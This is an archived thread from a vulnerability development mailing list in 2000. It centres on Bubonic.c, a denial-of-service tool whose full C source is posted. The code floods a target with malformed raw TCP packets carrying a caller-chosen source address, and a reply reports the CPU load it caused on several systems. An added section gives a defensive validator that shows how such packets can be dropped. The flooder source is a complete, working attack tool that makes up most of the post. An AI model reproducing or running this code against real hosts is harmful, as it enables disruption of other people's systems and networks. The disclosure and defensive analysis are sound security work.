Vulnerability Development mailing list archives
Re: Win2k & Linux DoS
From: Wolfgang Gassner <wulfmen () HOTMAIL COM>
Date: Mon, 28 Aug 2000 10:08:09 GMT
I played around a little with Bubonic.c and realized the following:

WinNT 4.0 SP6: CPU load at 60 %, nothing more, but tested on LAN and not over the Net!
Solaris 7.0 on Ultra: CPU load at around 40, nothing more, but tested on LAN and not over the Net!
Linux (SuSE 6.2, 6.4): No problem at all!
VMware 1.0 b.194 (SuSE 6.2 on NT): BINGO!! CPU load 100%, VMware not working until ending flooding!

My tests were all done over LAN!

cu
From: "J. Oquendo" <intrusion () ENGINEER COM>
Reply-To: "J. Oquendo" <intrusion () ENGINEER COM>
To: VULN-DEV () SECURITYFOCUS COM
Subject: Win2k & Linux DoS
Date: Fri, 25 Aug 2000 11:50:24 -0400
Approved-By: BlueBoar () THIEVCO COM
Message-ID: <383928042.967218630176.JavaMail.root () web303-mc mail com>
X-To: bugtraq () securityfocus com

Greetings everyone. While tampering with random codes when building a theoretical tool I managed to crash my Windows2000 laptop by randomizing TCP settings.
At first it wasn't a big deal since MS has gotten me used to seeing error codes with dumps for just about anything. Seems this code, which was in no way specified to attack any specific OS, brings the load up to extreme levels and is not limited to Win2K either. Written on an Ultra5 running Linux (zoot), I managed to drive this load up high after about 3 minutes, forcing the machine to lag drastically. So in essence I give to you Bubonic.c; maybe someone else can benchmark it and figure out what's going on.

Error code received during the WinCrash was:

STOP 0x00000041 (0x00001000,0x00001279,0x0000042a,0x00000001)
MUST_SUCCEED_POOL_EMPTY

-------- SNIP TO CODE --------

/*
 * Bubonic.c lame DoS against Windows 2000 machines
 * and certain versions of Linux (worked against an Ultra5
 * running Redhat Zoot. Should compile under anything.
 * Randomly sends TCP packets with random settings, etc.
 * Brings the load up causing the box to crash with
 * error code:
 * STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001)
 * MUST_SUCCEED_POOL_EMPTY
 * CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED.
 * WEE MULTICODE... www.antioffline.com/daemonic.c
 * shouts... hrmm fsck it why not...
 * #unixgods on the efnet, jhh, iggie, rajak, speye, obecian,
 * qwer7y, m3th, god-, tattooman, spikeman, and my wife.
 * Can't forget security staff all over the place.
 * Logs for the packets sent at www.antioffline.com/logged
 * Windows2K screen shots at www.antioffline.com/loads.html
 */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>      /* memset, memcpy */
#include <strings.h>
#include <time.h>        /* time() for the PRNG seed */
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

/* With IP_HDRINCL, Linux wants ip_len in network byte order and the BSDs
 * want host order; build with -DLINUX on Linux. */
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif

/* Pseudo-header prepended to the TCP header for the TCP checksum.
 * Addresses are 32-bit on the wire, so use fixed-width types. */
struct pseudo_hdr {
    uint32_t saddr, daddr;
    u_char   mbz, ptcl;
    u_short  tcpl;
};

/* What actually goes on the wire: IP header + TCP header, no payload. */
struct packet {
    struct ip     ip;
    struct tcphdr tcp;
};

/* Scratch buffer the TCP checksum is computed over. */
struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr     tcp;
};

struct packet      packet;
struct cksum       cksum;
struct sockaddr_in s_in;
u_short  bgport, bgsize;
uint32_t radd;    /* destination address, network order */
uint32_t sradd;   /* source address, network order */
int      sock;

void usage(char *progname)
{
    fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname);
    fprintf(stderr, "Ports are set to send and receive on port 179\n");
    fprintf(stderr, "dst:\tDestination Address\n");
    fprintf(stderr, "src:\tSource Address\n");
    fprintf(stderr, "size:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru routes\n");
    fprintf(stderr, "num:\tpackets\n\n");
    exit(1);
}

/* Standard one's-complement Internet checksum over len bytes. */
static u_short in_cksum(u_short *addr, int len)
{
    int      nleft = len;
    u_short *w = addr;
    int      sum = 0;
    u_short  answer = 0;

    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w;
        sum += answer;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}

/* Resolve a hostname to a 32-bit IPv4 address in network order. */
static uint32_t lookup(char *hostname)
{
    struct hostent *hp;
    uint32_t addr;

    if ((hp = gethostbyname(hostname)) == NULL) {
        fprintf(stderr, "Could not resolve %s fucknut\n", hostname);
        exit(1);
    }
    memcpy(&addr, hp->h_addr, sizeof(addr));
    return addr;
}

void flooder(void)
{
    int i;

    memset(&packet, 0, sizeof(packet));

    /* IP header: the only fields that are sane are version, length, TTL,
     * protocol and the addresses; TOS and ID are random. */
    packet.ip.ip_hl  = 5;
    packet.ip.ip_v   = 4;
    packet.ip.ip_p   = IPPROTO_TCP;
    packet.ip.ip_tos = rand();
    packet.ip.ip_id  = radd;
    packet.ip.ip_len = FIX(sizeof(packet));
    packet.ip.ip_off = 0;
    packet.ip.ip_ttl = 255;
    packet.ip.ip_dst.s_addr = radd;

    /* TCP header "random settings": flags, seq, urgent pointer and port are
     * random, th_off is left at 0 (an invalid data offset), and the length in
     * the pseudo-header is random, so the TCP checksum never verifies. */
    packet.tcp.th_flags = random();
    packet.tcp.th_win   = 65535;
    packet.tcp.th_seq   = random();
    packet.tcp.th_ack   = 0;
    packet.tcp.th_off   = 0;
    packet.tcp.th_urp   = random();
    packet.tcp.th_dport = random();

    cksum.pseudo.saddr = sradd;
    cksum.pseudo.daddr = radd;
    cksum.pseudo.mbz   = 0;
    cksum.pseudo.ptcl  = IPPROTO_TCP;
    cksum.pseudo.tcpl  = random();

    s_in.sin_family      = AF_INET;
    s_in.sin_addr.s_addr = radd;
    s_in.sin_port        = packet.tcp.th_dport;

    /* Runs until the process is killed. Every 1024 packets a new source port
     * is picked; flags and ack are re-randomized on every packet. */
    for (i = 0; ; ++i) {
        if (!(i & 0x3FF)) {
            packet.tcp.th_sport = rand();
            cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
            packet.tcp.th_flags = random();
            packet.tcp.th_ack   = rand();
        } else {
            packet.tcp.th_flags = rand();
            packet.tcp.th_ack   = rand();
        }
        ++packet.ip.ip_id;
        /* ++packet.tcp.th_sport; */
        ++packet.tcp.th_seq;

        /* bgport non-zero keeps the random port chosen above for the whole
         * run; zero picks a new random destination port per packet. */
        if (!bgport)
            s_in.sin_port = packet.tcp.th_dport = rand();

        packet.ip.ip_sum  = 0;
        packet.tcp.th_sum = 0;
        cksum.tcp = packet.tcp;
        packet.ip.ip_sum  = in_cksum((void *)&packet.ip, 20);
        packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));

        /* Send errors are ignored on purpose; keep flooding. */
        if (sendto(sock, &packet, sizeof(packet), 0,
                   (struct sockaddr *)&s_in, sizeof(s_in)) < 0)
            ;
    }
}

int main(int argc, char *argv[])
{
    int on = 1;

    printf("Bubonic -- sil () antioffline com\n\n");
    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("socket");
        exit(1);
    }
    /* Raw socket is open; drop privileges if installed setuid root. */
    setgid(getgid());
    setuid(getuid());
    if (argc < 5)
        usage(argv[0]);
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
        perror("setsockopt");
        exit(1);
    }
    srand((time(NULL) ^ getpid()) + getppid());
    printf("\nFinding host\n");
    fflush(stdout);
    radd = lookup(argv[1]);
    /* Despite what usage() says, argv[3] only acts as a "fixed port" switch
     * (0 = new random port per packet) and argv[4] is parsed but never used;
     * both are leftovers from the BGP tool this was cut from. */
    bgport = atoi(argv[3]);
    bgsize = atoi(argv[4]);
    sradd = lookup(argv[2]);
    printf("AntiOffline -- Putting the Hero in Heroin\n");
    flooder();
    return 0;
}

<< bubonic.c >>
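The packets bubonic.c sends carry a TCP data offset of 0 and a checksum computed over a random pseudo-header length, so a receiving stack can reject every one of them on header sanity alone, before any connection-table or socket work. The following validator is an added example, not code from either post and not the tool's own; it applies the checks a host or an in-line filter would apply to a raw IPv4/TCP packet and reports the first one that fails. The sample packets are constructed in the block with the field values bubonic uses (IHL 5, TTL 255, window 65535, data offset 0, correct IP checksum, bogus TCP checksum); the addresses 10.0.0.1/10.0.0.2 and the ports 1234 and 179 are made up for the example.

```c
/* Added example (not from either post, not bubonic's own code): the header
 * sanity checks a receiving stack applies to a raw IPv4/TCP packet before it
 * spends any real work on it.  Sample packets are constructed below with the
 * field values bubonic.c emits; addresses and ports are made up. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict {
    PKT_OK = 0, PKT_TRUNCATED, PKT_BAD_VERSION, PKT_BAD_IHL, PKT_BAD_IP_LEN,
    PKT_BAD_IP_CKSUM, PKT_NOT_TCP,
    PKT_BAD_TCP_OFFSET,   /* data offset below 5 words; bubonic sends 0 */
    PKT_BAD_FLAGS,        /* no flags at all, or SYN+FIN together */
    PKT_BAD_TCP_CKSUM     /* checksum over the pseudo-header does not verify */
};

/* RFC 1071 one's-complement sum of big-endian 16-bit words; reads bytes, so
 * the result does not depend on host byte order. */
static uint32_t sum16(const uint8_t *p, size_t len, uint32_t acc)
{
    for (; len > 1; p += 2, len -= 2)
        acc += ((uint32_t)p[0] << 8) | p[1];
    if (len)
        acc += (uint32_t)p[0] << 8;          /* odd trailing byte, zero padded */
    return acc;
}

/* Fold carries and complement.  Summed over data that already contains a
 * correct checksum field this yields 0, which is the verification test. */
static uint16_t csum_fold(uint32_t acc)
{
    while (acc >> 16)
        acc = (acc & 0xffff) + (acc >> 16);
    return (uint16_t)~acc;
}

/* TCP pseudo-header: source, destination, zero, protocol 6, TCP length. */
static uint32_t tcp_pseudo_sum(const uint8_t *iph, size_t tcplen)
{
    return sum16(iph + 12, 8, 0) + 6 + (uint32_t)tcplen;
}

enum verdict check_tcp_packet(const uint8_t *pkt, size_t len)
{
    if (len < 20)                       return PKT_TRUNCATED;
    if ((pkt[0] >> 4) != 4)             return PKT_BAD_VERSION;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || ihl > len)          return PKT_BAD_IHL;
    size_t tot = ((size_t)pkt[2] << 8) | pkt[3];
    if (tot < ihl || tot > len)         return PKT_BAD_IP_LEN;
    if (csum_fold(sum16(pkt, ihl, 0)))  return PKT_BAD_IP_CKSUM;
    if (pkt[9] != 6)                    return PKT_NOT_TCP;

    const uint8_t *tcp = pkt + ihl;
    size_t tcplen = tot - ihl;
    if (tcplen < 20)                    return PKT_TRUNCATED;
    size_t doff = (size_t)(tcp[12] >> 4) * 4;
    if (doff < 20 || doff > tcplen)     return PKT_BAD_TCP_OFFSET;
    uint8_t flags = tcp[13] & 0x3f;     /* URG ACK PSH RST SYN FIN */
    if (flags == 0 || (flags & 0x03) == 0x03) return PKT_BAD_FLAGS;
    if (csum_fold(sum16(tcp, tcplen, tcp_pseudo_sum(pkt, tcplen))))
        return PKT_BAD_TCP_CKSUM;
    return PKT_OK;
}

/* Build a 40-byte IPv4+TCP packet (no options, no payload) from constructed
 * values: 10.0.0.1:1234 -> 10.0.0.2:179, TTL 255, window 65535 as in bubonic.
 * The IP checksum is always correct, as bubonic's is; the TCP checksum is
 * correct only when good_tcp_csum is set, otherwise a fixed bogus value. */
void build_packet(uint8_t out[40], uint8_t doff_words, uint8_t flags, int good_tcp_csum)
{
    memset(out, 0, 40);
    out[0] = 0x45; out[3] = 40; out[4] = 0x12; out[5] = 0x34; out[8] = 255; out[9] = 6;
    out[12] = 10; out[15] = 1; out[16] = 10; out[19] = 2;
    uint8_t *tcp = out + 20;
    tcp[0] = 0x04; tcp[1] = 0xd2; tcp[3] = 0xb3; tcp[7] = 0x01;
    tcp[12] = (uint8_t)(doff_words << 4); tcp[13] = flags;
    tcp[14] = 0xff; tcp[15] = 0xff;
    uint16_t ic = csum_fold(sum16(out, 20, 0));
    out[10] = ic >> 8; out[11] = ic & 0xff;
    uint16_t tc = good_tcp_csum ? csum_fold(sum16(tcp, 20, tcp_pseudo_sum(out, 20))) : 0xdead;
    tcp[16] = tc >> 8; tcp[17] = tc & 0xff;
}

/* Build, optionally flip one bit in byte flip_byte (-1 = none), and check
 * the first len bytes.  This is what main() and the checks below call. */
enum verdict scenario(uint8_t doff_words, uint8_t flags, int good_tcp_csum, int flip_byte, size_t len)
{
    uint8_t p[40];
    build_packet(p, doff_words, flags, good_tcp_csum);
    if (flip_byte >= 0) p[flip_byte] ^= 0x01;
    return check_tcp_packet(p, len);
}

int main(void)
{
    static const char *name[] = { "ok", "truncated", "bad-version", "bad-ihl", "bad-ip-len",
        "bad-ip-cksum", "not-tcp", "bad-tcp-offset", "bad-flags", "bad-tcp-cksum" };
    printf("bubonic-style (doff 0, bad sum): %s\n", name[scenario(0, 0x12, 0, -1, 40)]);
    printf("well-formed SYN:                 %s\n", name[scenario(5, 0x02, 1, -1, 40)]);
    printf("SYN, urgent pointer bit flipped: %s\n", name[scenario(5, 0x02, 1, 39, 40)]);
    printf("null flags:                      %s\n", name[scenario(5, 0x00, 1, -1, 40)]);
    return 0;
}
```

Every packet bubonic emits fails at the data-offset check, one byte into the TCP header, so the check itself says nothing about where the CPU load reported in this thread comes from on a given stack; it only shows how little of each packet has to be read before it can be dropped, which is the work an in-line filter would do on the target's behalf.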
Current thread:
- Win2k & Linux DoS J. Oquendo (Aug 25)
- <Possible follow-ups>
- Re: Win2k & Linux DoS J. Oquendo (Aug 25)
- Re: Win2k & Linux DoS Vitaly McLain (Aug 26)
- Re: Win2k & Linux DoS Wolfgang Gassner (Aug 28)